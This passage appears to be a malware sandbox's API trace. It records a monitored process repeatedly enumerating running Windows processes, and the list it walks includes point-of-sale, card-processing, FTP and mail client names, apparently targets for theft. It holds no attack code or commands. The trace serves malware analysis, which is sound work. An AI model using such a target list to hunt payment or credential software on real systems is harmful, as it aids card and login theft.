lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0089.554] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0089.557] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0089.561] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0089.565] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0089.567] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0089.569] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0089.572] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0089.574] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0089.577] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0089.580] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0089.582] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0089.585] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0089.587] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0089.589] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0089.592] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unit.exe")) returned 1 [0089.602] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="military mission finish.exe")) returned 1 [0089.604] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0089.606] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0089.609] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0089.611] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0089.614] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0089.616] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0089.618] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0089.620] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0089.622] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0089.625] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0089.627] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0089.629] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.632] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0089.637] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0089.639] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0089.641] CloseHandle (hObject=0x6d4) returned 1 [0089.641] Sleep (dwMilliseconds=0x64) [0089.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0089.759] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0089.760] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0089.762] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0089.763] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.766] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0089.768] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.769] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0089.771] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0089.772] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0089.774] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0089.775] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.777] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.778] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.780] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.782] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.783] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.785] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0089.786] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0089.788] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.789] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0089.790] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.792] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.794] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0089.795] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.797] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.799] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.801] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.802] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.804] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0089.805] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0089.807] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0089.808] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0089.809] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0089.811] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0089.813] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0089.814] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0089.816] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0089.817] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0089.819] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0089.820] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0089.822] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0089.823] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0089.826] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0089.827] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0089.829] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0089.831] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0089.833] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0089.835] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0089.836] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0089.838] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0089.839] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0089.841] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: 